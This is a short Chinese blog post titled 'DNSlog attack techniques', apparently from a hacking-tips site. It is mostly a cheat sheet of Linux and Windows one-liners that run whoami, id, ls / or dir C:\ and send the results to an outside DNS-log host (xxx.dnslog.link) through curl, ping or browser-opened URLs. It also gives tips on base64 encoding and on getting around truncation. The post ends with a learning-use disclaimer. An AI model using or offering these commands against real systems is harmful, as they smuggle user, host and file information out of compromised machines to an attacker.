DNSlog攻击技巧

  • 内容
  • 相关

linux:

curl http://xxx.dnslog.link/`whoami`
ping -c 1 `whoami`.xxx.dnslog.link
 
如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制;
curl http://xxx.dnslog.link/$(id|base64)
 
碰到ls这类多个输出的命令,直接使用脚本;
for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done;
windows:

利用HTTP请求:
for /F %x in ('whoami') do start http://xxx.dnslog.link/%x
将结果使用默认浏览器弹出;
 
利用DNS请求:
获取计算机名:for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link
获取用户名:for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link
 
不能编码输出,但利用powershell可以实现;
 
dir有/b参数,不显示修改日期等信息,只显示文件名,所以可以弹出;
for /F %x in ('dir /b C:\') do start http://xxx.dnslog.link/[%x].jpg

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:DNSlog攻击技巧 - https://www.0dayhack.com/post-481.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

00:00 / 00:00
顺序播放